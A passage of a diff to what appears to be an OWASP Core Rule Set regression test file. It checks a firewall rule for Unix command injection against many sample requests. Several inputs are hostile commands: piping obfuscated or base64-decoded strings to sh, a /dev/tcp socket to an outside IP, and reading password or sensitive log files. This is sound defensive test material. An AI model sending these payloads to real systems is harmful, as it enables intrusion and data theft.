port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'foo=time is of the essence' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-6 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'x=printf%20dwssap/cte/%20tac%20|%20rev%20|%20sh' - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-7 + - test_id: 1 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932260-1=bash%20-c%20%22echo%20test%22" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 2 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932260-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 4 + stages: + - 
input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=ping pong tables' + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 5 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=time is of the essence' + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 6 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'x=printf%20dwssap/cte/%20tac%20|%20rev%20|%20sh' + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "932260" + - test_id: 7 desc: "Unix Command Injection - python version bypass test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=python cmd" - uri: "/get?cmd=python3.10%20cmd" - version: HTTP/1.0 - output: - log_contains: id "932260" - - test_title: 932260-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=python cmd" + uri: "/get?cmd=python3.10%20cmd" + version: HTTP/1.0 + output: + log_contains: id "932260" + - test_id: 8 desc: "Unix Command Injection - 
printf bypass test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=printf dW5hbWUgLWE=|base64 -d|sh" - uri: "/get?cmd=printf%20dW5hbWUgLWE=%7Cbase64%20-d%7Csh" - version: HTTP/1.0 - output: - log_contains: id "932260" - - test_title: 932260-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=printf dW5hbWUgLWE=|base64 -d|sh" + uri: "/get?cmd=printf%20dW5hbWUgLWE=%7Cbase64%20-d%7Csh" + version: HTTP/1.0 + output: + log_contains: id "932260" + - test_id: 9 desc: "Positive test: Data exfiltration with gunzip" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=gunzip -c /var/log/sensitive_log_file.gz' - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-10 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=gunzip -c /var/log/sensitive_log_file.gz' + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "932260" + - test_id: 10 desc: "Positive test: Data exfiltration with zstdcat" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=zstdcat /var/log/sensitive_log_file.zst' - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-11 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=zstdcat /var/log/sensitive_log_file.zst' + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "932260" + - test_id: 11 desc: "Positive test: Unix Command Injection - busybox test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=busybox -c "echo hi" - uri: "/get?code=busybox%20-c%20%22echo%20hi%22" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=busybox -c "echo hi" + uri: "/get?code=busybox%20-c%20%22echo%20hi%22" + version: "HTTP/1.1" + output: + log_contains: id "932260" + - test_id: 12 desc: Remote Command Execution bypass with time stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+bsdtar+" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 
932260-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+bsdtar+" + version: HTTP/1.1 + output: + log_contains: id "932260" + - test_id: 13 desc: Remote Command Execution bypass with time negative test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner+" - version: HTTP/1.1 - output: - no_log_contains: id "932260" - - test_title: 932260-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner+" + version: HTTP/1.1 + output: + no_log_contains: id "932260" + - test_id: 14 desc: Remote Command Injection test for BB finding 935E1D91 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+curl+coreruleset.org" - version: HTTP/1.1 - output: - no_log_contains: id "932260" - - test_title: 932260-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+curl+coreruleset.org" + version: HTTP/1.1 + output: + no_log_contains: id "932260" + - test_id: 15 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ti''me+curl+coreruleset.org" - version: HTTP/1.1 - output: - no_log_contains: id "932260" - - test_title: 932260-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ti''me+curl+coreruleset.org" + version: HTTP/1.1 + output: + no_log_contains: id "932260" + - test_id: 16 desc: System Command Injection test for BB finding AV6ZO3ZS - mixed case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo='ZsTdcaT+/var/log/sensitive_log_file.zst" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo='ZsTdcaT+/var/log/sensitive_log_file.zst" + version: HTTP/1.1 + output: + log_contains: id "932260" + - test_id: 17 desc: "'find' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=find%20.%201%20-exec%20curl%20google.com%20\\;" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-18 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=find%20.%201%20-exec%20curl%20google.com%20\\;" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 18 desc: "'find' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=find%20x%20for%20y" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-19 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=find%20x%20for%20y" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 19 desc: "'ping' direct command injection FP 
test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ping%20127.0.0.1" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-20 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ping%20127.0.0.1" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 20 desc: "FP for 'head of'" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "job_title=head%20of" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-21 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "job_title=head%20of" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 21 desc: "False positive test: 'evaluation' (FP while rule looks for 'eval')" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?word=evaluation" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-22 + - input: + dest_addr: 
"127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?word=evaluation" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 22 desc: "False positive test: 'schedule' (FP while rule looks for 'sched')" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?word=schedule" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-23 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?word=schedule" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 23 desc: "FP with word comment Github Issue #3387" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=comment" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-24 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=comment" + version: HTTP/1.0 + output: + no_log_contains: id "932260" + - test_id: 24 desc: "FP against name 'Perlak' (matches 'perl')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?last_name=Perlak" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-25 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?last_name=Perlak" + version: HTTP/1.0 + output: + no_log_contains: id "932260" + - test_id: 25 desc: "FP against word 'Axel'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?first_name=Axel" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-26 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?first_name=Axel" + version: HTTP/1.0 + output: + no_log_contains: id "932260" + - test_id: 26 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=performance" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-27 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=performance" + version: HTTP/1.0 + output: + no_log_contains: id "932260" + - test_id: 27 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=perf --version" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-28 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=perf --version" + version: HTTP/1.1 + output: + log_contains: id "932260" + - test_id: 28 desc: | Match despite quote evasion attempt. 932260 accidentally contained a chain rule for some time that enabled trivial bypasses, by excluding matches against number separators (see 932240). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?a=whoami;0'0'\"" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-29 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?a=whoami;0'0'\"" + version: HTTP/1.1 + output: + log_contains: id "932260" + - test_id: 29 desc: "FP against word 'Cronk'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?last_name=Cronk" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-30 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?last_name=Cronk" + version: HTTP/1.0 + output: + no_log_contains: id "932260" + - test_id: 30 desc: "Block ad-hoc ansible commands" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible all -m ping - output: - log_contains: id "932260" - - test_title: 932260-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible all -m ping + output: + log_contains: id "932260" + - test_id: 31 desc: "Block ansible config dump command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-config dump - output: - log_contains: id "932260" - - test_title: 932260-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-config dump + output: + log_contains: id "932260" + - test_id: 32 desc: "Block installing collections from ansible galaxy" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-galaxy collection install community.general - output: - log_contains: id "932260" - - test_title: 932260-33 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-galaxy collection install community.general + output: + log_contains: id "932260" + - test_id: 33 desc: "Block 
ad-hoc ansible commands using ansible-console" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-console - output: - log_contains: id "932260" - - test_title: 932260-34 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-console + output: + log_contains: id "932260" + - test_id: 34 desc: "Block ansible-doc command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-doc plugin ping - output: - log_contains: id "932260" - - test_title: 932260-35 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-doc plugin ping + output: + log_contains: id "932260" + - test_id: 35 desc: "Block dumping ansible inventory file and variables" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-inventory --list - output: - 
log_contains: id "932260" - - test_title: 932260-36 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-inventory --list + output: + log_contains: id "932260" + - test_id: 36 desc: "Block ansible pull from remote repository" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-pull --url example.com - output: - log_contains: id "932260" - - test_title: 932260-37 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-pull --url example.com + output: + log_contains: id "932260" + - test_id: 37 desc: "Block decrypting ansible secrets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-vault decrypt secret - output: - log_contains: id "932260" - - test_title: 932260-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-vault 
decrypt secret + output: + log_contains: id "932260" + - test_id: 38 desc: "Block execution of ansible playbooks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-playbook site.yml - output: - log_contains: id "932260" - - test_title: 932260-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-playbook site.yml + output: + log_contains: id "932260" + - test_id: 39 desc: "Block decryption of secrets with chef-vault" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 